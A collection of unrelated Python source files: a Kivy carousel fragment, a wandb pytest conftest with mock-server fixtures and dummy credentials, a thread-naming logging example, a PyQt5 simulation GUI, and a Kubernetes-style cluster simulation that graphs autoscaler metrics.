self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
conftest.py
|
from __future__ import print_function
import pytest
import time
import datetime
import requests
import os
import sys
import threading
import logging
import shutil
from contextlib import contextmanager
from tests import utils
from six.moves import queue
from wandb import wandb_sdk
# from multiprocessing import Process
import subprocess
import click
from click.testing import CliRunner
import webbrowser
import git
import psutil
import atexit
import wandb
import shutil
from wandb.util import mkdir_exists_ok
from six.moves import urllib
from wandb.sdk.lib.module import unset_globals
from wandb.sdk.lib.git import GitRepo
from wandb.sdk.internal.handler import HandleManager
from wandb.sdk.internal.sender import SendManager
from wandb.sdk.interface.interface import BackendSender
from wandb.proto import wandb_internal_pb2
from wandb.proto import wandb_internal_pb2 as pb
try:
import nbformat
except ImportError: # TODO: no fancy notebook fun in python2
pass
try:
from unittest.mock import MagicMock
except ImportError: # TODO: this is only for python2
from mock import MagicMock
DUMMY_API_KEY = "1824812581259009ca9981580f8f8a9012409eee"
class ServerMap(object):
def __init__(self):
self._map = {}
def items(self):
return self._map.items()
def __getitem__(self, worker_id):
if self._map.get(worker_id) is None:
self._map[worker_id] = start_mock_server(worker_id)
return self._map[worker_id]
servers = ServerMap()
def test_cleanup(*args, **kwargs):
print("Shutting down mock servers")
for wid, server in servers.items():
print("Shutting down {}".format(wid))
server.terminate()
print("Open files during tests: ")
proc = psutil.Process()
print(proc.open_files())
def start_mock_server(worker_id):
"""We start a flask server process for each pytest-xdist worker_id"""
port = utils.free_port()
root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
path = os.path.join(root, "tests", "utils", "mock_server.py")
command = [sys.executable, "-u", path]
env = os.environ
env["PORT"] = str(port)
env["PYTHONPATH"] = root
logfname = os.path.join(
root, "tests", "logs", "live_mock_server-{}.log".format(worker_id)
)
logfile = open(logfname, "w")
server = subprocess.Popen(
command,
stdout=logfile,
env=env,
stderr=subprocess.STDOUT,
bufsize=1,
close_fds=True,
)
server._port = port
server.base_url = "http://localhost:%i" % server._port
def get_ctx():
return requests.get(server.base_url + "/ctx").json()
def set_ctx(payload):
return requests.put(server.base_url + "/ctx", json=payload).json()
def reset_ctx():
return requests.delete(server.base_url + "/ctx").json()
server.get_ctx = get_ctx
server.set_ctx = set_ctx
server.reset_ctx = reset_ctx
started = False
for i in range(10):
try:
res = requests.get("%s/ctx" % server.base_url, timeout=5)
if res.status_code == 200:
started = True
break
print("Attempting to connect but got: %s" % res)
except requests.exceptions.RequestException:
print(
"Timed out waiting for server to start...", server.base_url, time.time()
)
if server.poll() is None:
time.sleep(1)
else:
raise ValueError("Server failed to start.")
if started:
print("Mock server listing on {} see {}".format(server._port, logfname))
else:
server.terminate()
print("Server failed to launch, see {}".format(logfname))
try:
print("=" * 40)
with open(logfname) as f:
for logline in f.readlines():
print(logline.strip())
print("=" * 40)
except Exception as e:
print("EXCEPTION:", e)
raise ValueError("Failed to start server! Exit code %s" % server.returncode)
return server
atexit.register(test_cleanup)
@pytest.fixture
def test_name(request):
# change "test[1]" to "test__1__"
name = urllib.parse.quote(request.node.name.replace("[", "__").replace("]", "__"))
return name
@pytest.fixture
def test_dir(test_name):
orig_dir = os.getcwd()
root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
test_dir = os.path.join(root, "tests", "logs", test_name)
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
mkdir_exists_ok(test_dir)
os.chdir(test_dir)
yield test_dir
os.chdir(orig_dir)
@pytest.fixture
def git_repo(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
mkdir_exists_ok("wandb")
# Because the forked process doesn't use my monkey patch above
with open("wandb/settings", "w") as f:
f.write("[default]\nproject: test")
open("README", "wb").close()
r.index.add(["README"])
r.index.commit("Initial commit")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:bar@github.com/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote_and_empty_pass(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:@github.com/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def dummy_api_key():
return DUMMY_API_KEY
@pytest.fixture
def test_settings(test_dir, mocker, live_mock_server):
"""Settings object for tests"""
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
wandb.wandb_sdk.wandb_run.EXIT_TIMEOUT = 15
wandb.wandb_sdk.wandb_setup._WandbSetup.instance = None
wandb_dir = os.path.join(test_dir, "wandb")
mkdir_exists_ok(wandb_dir)
# root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
settings = wandb.Settings(
_start_time=time.time(),
base_url=live_mock_server.base_url,
root_dir=test_dir,
save_code=False,
project="test",
console="off",
host="test",
api_key=DUMMY_API_KEY,
run_id=wandb.util.generate_id(),
_start_datetime=datetime.datetime.now(),
)
yield settings
# Just incase someone forgets to join in tests
if wandb.run is not None:
wandb.run.finish()
@pytest.fixture
def mocked_run(runner, test_settings):
"""A managed run object for tests with a mock backend"""
run = wandb.wandb_sdk.wandb_run.Run(settings=test_settings)
run._set_backend(MagicMock())
yield run
@pytest.fixture
def runner(monkeypatch, mocker):
# monkeypatch.setattr('wandb.cli.api', InternalApi(
# default_settings={'project': 'test', 'git_tag': True}, load_settings=False))
monkeypatch.setattr(wandb.util, "prompt_choices", lambda x: x[0])
monkeypatch.setattr(wandb.wandb_lib.apikey, "prompt_choices", lambda x: x[0])
monkeypatch.setattr(click, "launch", lambda x: 1)
monkeypatch.setattr(webbrowser, "open_new_tab", lambda x: True)
mocker.patch("wandb.wandb_lib.apikey.isatty", lambda stream: True)
mocker.patch("wandb.wandb_lib.apikey.input", lambda x: 1)
mocker.patch("wandb.wandb_lib.apikey.getpass.getpass", lambda x: DUMMY_API_KEY)
return CliRunner()
@pytest.fixture(autouse=True)
def reset_setup():
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
@pytest.fixture(autouse=True)
def local_netrc(monkeypatch):
"""Never use our real credentials, put them in their own isolated dir"""
with CliRunner().isolated_filesystem():
# TODO: this seems overkill...
origexpand = os.path.expanduser
# Touch that netrc
open(".netrc", "wb").close()
def expand(path):
if "netrc" in path:
try:
ret = os.path.realpath("netrc")
except OSError:
ret = origexpand(path)
else:
ret = origexpand(path)
return ret
monkeypatch.setattr(os.path, "expanduser", expand)
yield
@pytest.fixture(autouse=True)
def local_settings(mocker):
"""Place global settings in an isolated dir"""
with CliRunner().isolated_filesystem():
cfg_path = os.path.join(os.getcwd(), ".config", "wandb", "settings")
mkdir_exists_ok(os.path.join(".config", "wandb"))
mocker.patch("wandb.old.settings.Settings._global_path", return_value=cfg_path)
yield
@pytest.fixture
def mock_server(mocker):
return utils.mock_server(mocker)
# We create one live_mock_server per pytest-xdist worker
@pytest.fixture
def live_mock_server(request, worker_id):
global servers
server = servers[worker_id]
name = urllib.parse.quote(request.node.name)
# We set the username so the mock backend can namespace state
os.environ["WANDB_USERNAME"] = name
os.environ["WANDB_BASE_URL"] = server.base_url
os.environ["WANDB_ERROR_REPORTING"] = "false"
os.environ["WANDB_API_KEY"] = DUMMY_API_KEY
# clear mock server ctx
server.reset_ctx()
yield server
del os.environ["WANDB_USERNAME"]
del os.environ["WANDB_BASE_URL"]
del os.environ["WANDB_ERROR_REPORTING"]
del os.environ["WANDB_API_KEY"]
@pytest.fixture
def notebook(live_mock_server, test_dir):
"""This launches a live server, configures a notebook to use it, and enables
devs to execute arbitrary cells. See tests/test_notebooks.py
"""
@contextmanager
def notebook_loader(nb_path, kernel_name="wandb_python", save_code=True, **kwargs):
with open(utils.notebook_path("setup.ipynb")) as f:
setupnb = nbformat.read(f, as_version=4)
setupcell = setupnb["cells"][0]
# Ensure the notebooks talks to our mock server
new_source = setupcell["source"].replace(
"__WANDB_BASE_URL__", live_mock_server.base_url,
)
if save_code:
new_source = new_source.replace("__WANDB_NOTEBOOK_NAME__", nb_path)
else:
new_source = new_source.replace("__WANDB_NOTEBOOK_NAME__", "")
setupcell["source"] = new_source
nb_path = utils.notebook_path(nb_path)
shutil.copy(nb_path, os.path.join(os.getcwd(), os.path.basename(nb_path)))
with open(nb_path) as f:
nb = nbformat.read(f, as_version=4)
nb["cells"].insert(0, setupcell)
try:
client = utils.WandbNotebookClient(nb, kernel_name=kernel_name)
with client.setup_kernel(**kwargs):
# Run setup commands for mocks
client.execute_cells(-1, store_history=False)
yield client
finally:
with open(os.path.join(os.getcwd(), "notebook.log"), "w") as f:
f.write(client.all_output_text())
wandb.termlog("Find debug logs at: %s" % os.getcwd())
wandb.termlog(client.all_output_text())
notebook_loader.base_url = live_mock_server.base_url
return notebook_loader
@pytest.fixture
def mocked_module(monkeypatch):
"""This allows us to mock modules loaded via wandb.util.get_module"""
def mock_get_module(module):
orig_get_module = wandb.util.get_module
mocked_module = MagicMock()
def get_module(mod):
if mod == module:
return mocked_module
else:
return orig_get_module(mod)
monkeypatch.setattr(wandb.util, "get_module", get_module)
return mocked_module
return mock_get_module
@pytest.fixture
def mocked_ipython(monkeypatch):
monkeypatch.setattr(
wandb.wandb_sdk.wandb_settings, "_get_python_type", lambda: "jupyter"
)
ipython = MagicMock()
# TODO: this is really unfortunate, for reasons not clear to me, monkeypatch doesn't work
orig_get_ipython = wandb.jupyter.get_ipython
wandb.jupyter.get_ipython = lambda: ipython
yield ipython
wandb.jupyter.get_ipython = orig_get_ipython
def default_wandb_args():
"""This allows us to parameterize the wandb_init_run fixture
The most general arg is "env", you can call:
@pytest.mark.wandb_args(env={"WANDB_API_KEY": "XXX"})
To set env vars and have them unset when the test completes.
"""
return {
"error": None,
"k8s": None,
"sagemaker": False,
"tensorboard": False,
"resume": False,
"env": {},
"wandb_init": {},
}
def mocks_from_args(mocker, args, mock_server):
if args["k8s"] is not None:
mock_server.ctx["k8s"] = args["k8s"]
args["env"].update(utils.mock_k8s(mocker))
if args["sagemaker"]:
args["env"].update(utils.mock_sagemaker(mocker))
@pytest.fixture
def wandb_init_run(request, runner, mocker, mock_server):
marker = request.node.get_closest_marker("wandb_args")
args = default_wandb_args()
if marker:
args.update(marker.kwargs)
try:
mocks_from_args(mocker, args, mock_server)
for k, v in args["env"].items():
os.environ[k] = v
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
# We want to run setup every time in tests
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
mocker.patch("wandb.wandb_sdk.wandb_init.Backend", utils.BackendMock)
run = wandb.init(
settings=wandb.Settings(console="off", mode="offline", _except_exit=False),
**args["wandb_init"]
)
yield run
wandb.join()
finally:
unset_globals()
for k, v in args["env"].items():
del os.environ[k]
@pytest.fixture
def wandb_init(request, runner, mocker, mock_server):
def init(*args, **kwargs):
try:
mocks_from_args(mocker, default_wandb_args(), mock_server)
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
# We want to run setup every time in tests
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
mocker.patch("wandb.wandb_sdk.wandb_init.Backend", utils.BackendMock)
return wandb.init(
settings=wandb.Settings(
console="off", mode="offline", _except_exit=False
),
*args,
**kwargs
)
finally:
unset_globals()
return init
@pytest.fixture()
def restore_version():
save_current_version = wandb.__version__
yield
wandb.__version__ = save_current_version
try:
del wandb.__hack_pypi_latest_version__
except AttributeError:
pass
@pytest.fixture()
def disable_console():
os.environ["WANDB_CONSOLE"] = "off"
yield
del os.environ["WANDB_CONSOLE"]
@pytest.fixture()
def parse_ctx():
"""Fixture providing class to parse context data."""
def parse_ctx_fn(ctx, run_id=None):
return utils.ParseCTX(ctx, run_id=run_id)
yield parse_ctx_fn
@pytest.fixture()
def record_q():
return queue.Queue()
@pytest.fixture()
def fake_interface(record_q):
return BackendSender(record_q=record_q)
@pytest.fixture
def fake_backend(fake_interface):
class FakeBackend:
def __init__(self):
self.interface = fake_interface
yield FakeBackend()
@pytest.fixture
def fake_run(fake_backend):
def run_fn():
s = wandb.Settings()
run = wandb_sdk.wandb_run.Run(settings=s)
run._set_backend(fake_backend)
return run
yield run_fn
@pytest.fixture
def records_util():
def records_fn(q):
ru = utils.RecordsUtil(q)
return ru
yield records_fn
@pytest.fixture
def user_test(fake_run, record_q, records_util):
class UserTest:
pass
ut = UserTest()
ut.get_run = fake_run
ut.get_records = lambda: records_util(record_q)
yield ut
# @pytest.hookimpl(tryfirst=True, hookwrapper=True)
# def pytest_runtest_makereport(item, call):
# outcome = yield
# rep = outcome.get_result()
# if rep.when == "call" and rep.failed:
# print("DEBUG PYTEST", rep, item, call, outcome)
@pytest.fixture
def log_debug(caplog):
caplog.set_level(logging.DEBUG)
yield
# for rec in caplog.records:
# print("LOGGER", rec.message, file=sys.stderr)
# ----------------------
# internal test fixtures
# ----------------------
@pytest.fixture()
def internal_result_q():
return queue.Queue()
@pytest.fixture()
def internal_sender_q():
return queue.Queue()
@pytest.fixture()
def internal_writer_q():
return queue.Queue()
@pytest.fixture()
def internal_process():
# FIXME: return mocked process (needs is_alive())
return MockProcess()
class MockProcess:
def __init__(self):
self._alive = True
def is_alive(self):
return self._alive
@pytest.fixture()
def _internal_sender(record_q, internal_result_q, internal_process):
return BackendSender(
record_q=record_q, result_q=internal_result_q, process=internal_process,
)
@pytest.fixture()
def internal_sm(
runner,
internal_sender_q,
internal_result_q,
test_settings,
mock_server,
_internal_sender,
):
with runner.isolated_filesystem():
test_settings.root_dir = os.getcwd()
sm = SendManager(
settings=test_settings,
record_q=internal_sender_q,
result_q=internal_result_q,
interface=_internal_sender,
)
yield sm
@pytest.fixture()
def stopped_event():
stopped = threading.Event()
yield stopped
@pytest.fixture()
def internal_hm(
runner,
record_q,
internal_result_q,
test_settings,
mock_server,
internal_sender_q,
internal_writer_q,
_internal_sender,
stopped_event,
):
with runner.isolated_filesystem():
test_settings.root_dir = os.getcwd()
hm = HandleManager(
settings=test_settings,
record_q=record_q,
result_q=internal_result_q,
stopped=stopped_event,
sender_q=internal_sender_q,
writer_q=internal_writer_q,
interface=_internal_sender,
)
yield hm
@pytest.fixture()
def internal_get_record():
def _get_record(input_q, timeout=None):
try:
i = input_q.get(timeout=timeout)
except queue.Empty:
return None
return i
return _get_record
@pytest.fixture()
def start_send_thread(
internal_sender_q, internal_get_record, stopped_event, internal_process
):
def start_send(send_manager):
def target():
try:
while True:
payload = internal_get_record(
input_q=internal_sender_q, timeout=0.1
)
if payload:
send_manager.send(payload)
elif stopped_event.is_set():
break
except Exception as e:
stopped_event.set()
internal_process._alive = False
t = threading.Thread(target=target)
t.name = "testing-sender"
t.daemon = True
t.start()
return t
yield start_send
stopped_event.set()
@pytest.fixture()
def start_handle_thread(record_q, internal_get_record, stopped_event):
def start_handle(handle_manager):
def target():
while True:
payload = internal_get_record(input_q=record_q, timeout=0.1)
if payload:
handle_manager.handle(payload)
elif stopped_event.is_set():
break
t = threading.Thread(target=target)
t.name = "testing-handler"
t.daemon = True
t.start()
return t
yield start_handle
stopped_event.set()
@pytest.fixture()
def _start_backend(
mocked_run,
internal_hm,
internal_sm,
_internal_sender,
start_handle_thread,
start_send_thread,
log_debug,
):
def start_backend_func(initial_run=True, initial_start=False):
ht = start_handle_thread(internal_hm)
st = start_send_thread(internal_sm)
if initial_run:
run = _internal_sender.communicate_run(mocked_run)
if initial_start:
_internal_sender.communicate_run_start(run.run)
return (ht, st)
yield start_backend_func
@pytest.fixture()
def _stop_backend(
mocked_run,
internal_hm,
internal_sm,
_internal_sender,
start_handle_thread,
start_send_thread,
):
def stop_backend_func(threads=None):
threads = threads or ()
done = False
_internal_sender.publish_exit(0)
for _ in range(30):
poll_exit_resp = _internal_sender.communicate_poll_exit()
if poll_exit_resp:
done = poll_exit_resp.done
if done:
break
time.sleep(1)
_internal_sender.join()
for t in threads:
t.join()
assert done, "backend didnt shutdown"
yield stop_backend_func
@pytest.fixture()
def backend_interface(_start_backend, _stop_backend, _internal_sender):
@contextmanager
def backend_context(initial_run=True, initial_start=False):
threads = _start_backend(initial_run=initial_run, initial_start=initial_start)
try:
yield _internal_sender
finally:
_stop_backend(threads=threads)
return backend_context
@pytest.fixture
def publish_util(
mocked_run, mock_server, backend_interface, parse_ctx,
):
def fn(
metrics=None,
history=None,
artifacts=None,
files=None,
begin_cb=None,
end_cb=None,
initial_start=False,
):
metrics = metrics or []
history = history or []
artifacts = artifacts or []
files = files or []
with backend_interface(initial_start=initial_start) as interface:
if begin_cb:
begin_cb(interface)
for m in metrics:
interface._publish_metric(m)
for h in history:
interface.publish_history(**h)
for a in artifacts:
interface.publish_artifact(**a)
for f in files:
interface.publish_files(**f)
if end_cb:
end_cb(interface)
ctx_util = parse_ctx(mock_server.ctx, run_id=mocked_run.id)
return ctx_util
yield fn
@pytest.fixture
def tbwatcher_util(mocked_run, mock_server, internal_hm, backend_interface, parse_ctx):
def fn(write_function, logdir="./", save=True, root_dir="./"):
with backend_interface() as interface:
proto_run = pb.RunRecord()
mocked_run._make_proto_run(proto_run)
run_start = pb.RunStartRequest()
run_start.run.CopyFrom(proto_run)
request = pb.Request()
request.run_start.CopyFrom(run_start)
record = pb.Record()
record.request.CopyFrom(request)
internal_hm.handle_request_run_start(record)
internal_hm._tb_watcher.add(logdir, save, root_dir)
# need to sleep to give time for the tb_watcher delay
time.sleep(15)
write_function()
ctx_util = parse_ctx(mock_server.ctx)
return ctx_util
yield fn
@pytest.fixture
def inject_requests(mock_server):
"""Fixture for injecting responses and errors to mock_server."""
# TODO(jhr): make this compatible with live_mock_server
return utils.InjectRequests(ctx=mock_server.ctx)
|
threading_names_log.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""Using thread names in logs
"""
#end_pymotw_header
import logging
import threading
import time
logging.basicConfig(
level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-10s) %(message)s',
)
def worker():
logging.debug('Starting')
time.sleep(2)
logging.debug('Exiting')
def my_service():
logging.debug('Starting')
time.sleep(3)
logging.debug('Exiting')
t = threading.Thread(name='my_service', target=my_service)
w = threading.Thread(name='worker', target=worker)
w2 = threading.Thread(target=worker) # use default name
w.start()
w2.start()
t.start()
|
GUI_.py
|
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
import threading
import subprocess
import psutil
from mega_main import *
import sys
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
import matplotlib.pyplot
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
matplotlib.pyplot.style.use('dark_background')
class MorseGUI(QMainWindow):
def __init__(self):
super().__init__()
self.mainWidget = QStackedWidget()
self.setCentralWidget(self.mainWidget)
self.setWindowOpacity(0.8)
self.setStyleSheet(open("Style.qss", "r").read())
logoWidget = LogoWidget()
self.mainWidget.addWidget(logoWidget)
QTimer.singleShot(1, lambda: self.switch())
self.show()
def switch(self):
mainGUI = MainGUI()
self.mainWidget.addWidget(mainGUI)
self.mainWidget.setCurrentWidget(mainGUI)
class LogoWidget(QWidget):
def __init__(self):
super().__init__()
imageLabel = QLabel(self)
imageLabel.setPixmap(QPixmap('./logo.png'))
imageLabel.setGeometry(0, 0, 1000, 860)
layout = QHBoxLayout()
layout.addWidget(imageLabel)
self.setLayout(layout)
class MainGUI(QWidget):
def __init__(self):
super().__init__()
self.map3D = plt.figure(linewidth=1, edgecolor='g')
self.canvas3D = FigureCanvas(self.map3D)
self.map3D.add_subplot(111, projection="3d")
self.ax3D = Axes3D(self.map3D)
self.map3D.suptitle("Map 3D - estimation")
self.map2D = plt.figure(linewidth=1, edgecolor='g')
self.canvas = FigureCanvas(self.map2D)
self.ax2D = self.map2D.add_subplot(1, 1, 1)
self.map2D.suptitle("Map 2D - estimation")
self.map3Dpose = plt.figure(linewidth=1, edgecolor='g')
self.canvas3Dpose = FigureCanvas(self.map3Dpose)
self.map3Dpose.add_subplot(111, projection="3d")
self.ax3Dpose = Axes3D(self.map3Dpose)
self.map3Dpose.suptitle("Map 3D - Pose")
self.map2Dpose = plt.figure(linewidth=1, edgecolor='g')
self.canvasPose = FigureCanvas(self.map2Dpose)
self.ax2Dpose = self.map2Dpose.add_subplot(1, 1, 1)
self.map2Dpose.suptitle("Map 2D - Pose")
plt.ion()
self.simTimeInput = QTextEdit(self)
self.simTimeInput.setPlaceholderText("Enter simulation time here ")
self.simTimeInput.setFixedHeight(32)
self.stop_sim = False
self.initUI()
def initUI(self):
self.setGeometry(300, 300, 1000, 860)
start_button = QPushButton('Prepare Environment')
start_button.clicked.connect(self.blender_callback)
run_button = QPushButton('Run Simulation')
run_button.clicked.connect(self.start_callback)
stop_button = QPushButton('Stop Simulation')
stop_button.clicked.connect(self.stop_callback)
layout = QVBoxLayout()
top_box = QHBoxLayout()
mid_box = QHBoxLayout()
bottom_box = QHBoxLayout()
# top part of the GUI
top_box.addWidget(start_button)
top_box.addWidget(self.simTimeInput)
top_box.addWidget(run_button)
top_box.addWidget(stop_button)
# mid part of the GUI
mid_box.addWidget(self.canvas)
mid_box.addWidget(self.canvasPose)
# bottom part of the GUI
bottom_box.addWidget(self.canvas3D)
bottom_box.addWidget(self.canvas3Dpose)
layout.addLayout(top_box, 5)
layout.addLayout(mid_box, 5)
layout.addLayout(bottom_box, 5)
self.setLayout(layout)
self.show()
def blender_callback(self):
subprocess.call("gnome-terminal --tab -- morse run env.py", shell=True)
def start_callback(self):
self.simtime = int(self.simTimeInput.toPlainText())
print("pressed")
self.sim_thread = threading.Thread(target=self.background_tasks)
self.sim_thread.start()
def background_tasks(self):
self.megamain = MegaMain(self.ax2D, self.ax3D, self.ax2Dpose, self.ax3Dpose, self.simtime)
self.megamain.run_simulation()
def stop_callback(self):
self.stop_sim = True
PROCNAME = "blender"
for proc in psutil.process_iter():
if proc.name() == PROCNAME:
proc.kill()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = MorseGUI()
sys.exit(app.exec_())
|
runSimulation.py
|
import threading
from src.request import Request
from src.dep_controller import DepController
from src.api_server import APIServer
from src.req_handler import ReqHandler
from src.node_controller import NodeController
from src.scheduler import Scheduler
import matplotlib.pyplot as plt
import pandas as pd
from src.hpa import HPA
from src.load_balancer import LoadBalancer
from src.supervisor import Supervisor
import time
#This is the simulation frontend that will interact with your APIServer to change cluster configurations and handle requests
#All building files are guidelines, and you are welcome to change them as much as desired so long as the required functionality is still implemented.
_nodeCtlLoop = 1
_depCtlLoop = 1
_scheduleCtlLoop =1
_hpaCtlLoop = 2
kind = 'UA'
apiServer = APIServer()
depController = DepController(apiServer, _depCtlLoop)
nodeController = NodeController(apiServer, _nodeCtlLoop)
reqHandler = ReqHandler(apiServer)
scheduler = Scheduler(apiServer, _scheduleCtlLoop)
depControllerThread = threading.Thread(target=depController)
nodeControllerThread = threading.Thread(target=nodeController)
reqHandlerThread = threading.Thread(target=reqHandler)
schedulerThread = threading.Thread(target = scheduler)
print("Threads Starting")
reqHandlerThread.start()
nodeControllerThread.start()
depControllerThread.start()
schedulerThread.start()
print("ReadingFile")
#Graphing information
depPods1 = []
depPods2 = []
depPods3 = []
depPendPods1 = []
depPendPods2 = []
depPendPods3 = []
dep1PendReqs = []
dep2PendReqs = []
dep3PendReqs = []
stepList = []
#Simulation information
loadBalancers = []
hpas = []
supervisors = []
hpaThreads = []
loadBalancerThreads = []
supervisorThreads = []
count = 0
SEED = "ml_3"
instructions = open(f"tracefiles/{SEED}.txt", "r")
commands = instructions.readlines()
for command in commands:
cmdAttributes = command.split()
print(str(command))
with apiServer.etcdLock:
if cmdAttributes[0] == 'Deploy':
apiServer.CreateDeployment(cmdAttributes[1:])
deployment = apiServer.GetDepByLabel(cmdAttributes[1])
loadbalancer = LoadBalancer(kind, apiServer, deployment)
lbThread = threading.Thread(target=loadbalancer)
lbThread.start()
loadBalancers.append(loadbalancer)
loadBalancerThreads.append(lbThread)
elif cmdAttributes[0] == 'AddNode':
apiServer.CreateWorker(cmdAttributes[1:])
elif cmdAttributes[0] == 'DeleteDeployment':
#We have to makesure that our load balancer will end gracefully here
for loadBalancer in loadBalancers:
if loadBalancer.deployment.deploymentLabel == cmdAttributes[1]:
loadBalancer.running=False
apiServer.RemoveDeployment(cmdAttributes[1:])
elif cmdAttributes[0] == 'ReqIn':
apiServer.PushReq(cmdAttributes[1:])
elif cmdAttributes[0] == 'CreateHPA':
hpa = HPA(apiServer, _hpaCtlLoop, cmdAttributes[1:])
hpaThread = threading.Thread(target=hpa)
hpaThread.start()
hpas.append(hpa)
hpaThreads.append(hpaThread)
supervisor = Supervisor(apiServer, hpa)
supervisorThread = threading.Thread(target=supervisor)
supervisorThread.start()
supervisors.append(supervisor)
supervisorThreads.append(supervisorThread)
elif cmdAttributes[0] == 'CrashPod':
apiServer.CrashPod(cmdAttributes[1:])
#The instructions will sleep after each round of requests. The following code stores values for graphing
if cmdAttributes[0] == 'Sleep':
count+=1
time.sleep(int(cmdAttributes[1]))
if len(apiServer.etcd.deploymentList) == 1:
depPods1.append(apiServer.etcd.deploymentList[0].expectedReplicas)
depPods2.append(0)
depPods3.append(0)
count1 = 0
for pod in apiServer.etcd.pendingPodList:
if pod.deploymentLabel ==apiServer.etcd.deploymentList[0].deploymentLabel:
count1+=1
depPendPods1.append(count1)
depPendPods2.append(0)
depPendPods3.append(0)
dep1PendReqs.append(len(apiServer.etcd.deploymentList[0].pendingReqs))
dep2PendReqs.append(0)
dep3PendReqs.append(0)
elif len(apiServer.etcd.deploymentList) == 2:
depPods1.append(apiServer.etcd.deploymentList[0].expectedReplicas)
depPods2.append(apiServer.etcd.deploymentList[1].expectedReplicas)
depPods3.append(0)
count1 = 0
count2 = 0
for pod in apiServer.etcd.pendingPodList:
if pod.deploymentLabel ==apiServer.etcd.deploymentList[0].deploymentLabel:
count1+=1
if pod.deploymentLabel ==apiServer.etcd.deploymentList[1].deploymentLabel:
count2+=1
depPendPods1.append(count1)
depPendPods2.append(count2)
depPendPods3.append(0)
dep1PendReqs.append(len(apiServer.etcd.deploymentList[0].pendingReqs))
dep2PendReqs.append(len(apiServer.etcd.deploymentList[1].pendingReqs))
dep3PendReqs.append(0)
elif len(apiServer.etcd.deploymentList) == 3:
depPods1.append(apiServer.etcd.deploymentList[0].expectedReplicas)
depPods2.append(apiServer.etcd.deploymentList[1].expectedReplicas)
depPods3.append(apiServer.etcd.deploymentList[2].expectedReplicas)
count1 = 0
count2 = 0
count3 = 0
for pod in apiServer.etcd.pendingPodList:
if pod.deploymentLabel ==apiServer.etcd.deploymentList[0].deploymentLabel:
count1+=1
if pod.deploymentLabel ==apiServer.etcd.deploymentList[1].deploymentLabel:
count2+=1
if pod.deploymentLabel ==apiServer.etcd.deploymentList[1].deploymentLabel:
count3+=1
depPendPods1.append(count1)
depPendPods2.append(count2)
depPendPods3.append(count3)
dep1PendReqs.append(len(apiServer.etcd.deploymentList[0].pendingReqs))
dep2PendReqs.append(len(apiServer.etcd.deploymentList[1].pendingReqs))
dep3PendReqs.append(len(apiServer.etcd.deploymentList[2].pendingReqs))
else:
depPods1.append(0)
depPods2.append(0)
depPods3.append(0)
depPendPods1.append(0)
depPendPods2.append(0)
depPendPods3.append(0)
dep1PendReqs.append(0)
dep2PendReqs.append(0)
dep3PendReqs.append(0)
#pendReqsList.append(len(apiServer.etcd.pendingReqs))
stepList.append(count)
time.sleep(5)
print("Shutting down threads")
for hpa in hpas:
hpa.running = False
hpa.calibrate.set()
reqHandler.running = False
depController.running = False
scheduler.running = False
nodeController.running = False
apiServer.requestWaiting.set()
for lbthread in loadBalancerThreads:
lbthread.join()
for hpathread in hpaThreads:
hpathread .join()
for supervisorThread in supervisorThreads:
supervisorThread.join()
depControllerThread.join()
schedulerThread.join()
nodeControllerThread.join()
reqHandlerThread.join()
fig, ((hpa1, hpa2, hpa3), (pp, ap, pr)) = plt.subplots(2,3)
hpa1.plot(hpas[0].xValues, hpas[0].setPoints, color='black', label = 'Setpoint Dep1')
hpa1.plot(hpas[0].xValues, hpas[0].utilValues, color='blue', label = 'CPU util Dep1')
hpa1.set_title('HPA for Deployment 1')
hpa2.plot(hpas[1].xValues, hpas[1].setPoints, color='black', label = 'Setpoint Dep2')
hpa2.plot(hpas[1].xValues, hpas[1].utilValues, color='green', label = 'CPU util Dep2')
hpa2.set_title('HPA for Deployment 2')
hpa3.plot(hpas[2].xValues, hpas[2].setPoints, color='black', label = 'Setpoint Dep3')
hpa3.plot(hpas[2].xValues, hpas[2].utilValues, color='red', label = 'CPU util Dep3')
hpa3.set_title('HPA for Deployment 3')
pp.plot(stepList, depPendPods1, color = 'blue', label = 'Pending Pods Dep1')
pp.plot(stepList, depPendPods2, color = 'green', label = 'Pending Pod Dep2')
pp.plot(stepList, depPendPods3, color = 'red', label = 'Pending Pod Dep3')
ap.plot(stepList, depPods1, color = 'blue', label = 'Active Pods Dep1')
ap.plot(stepList, depPods2, color = 'green', label = 'Active Pods Dep2')
ap.plot(stepList, depPods3, color = 'red', label = 'Active Pods Dep3')
pr.plot(stepList, dep1PendReqs, color='blue', label = 'Pending Requests Dep1')
pr.plot(stepList, dep1PendReqs, color='green', label = 'Pending Requests Dep2')
pr.plot(stepList, dep1PendReqs, color='red', label = 'Pending Requests Dep3')
for ax in fig.get_axes():
ax.legend()
plt.savefig(f'graph/{SEED}_main.png')
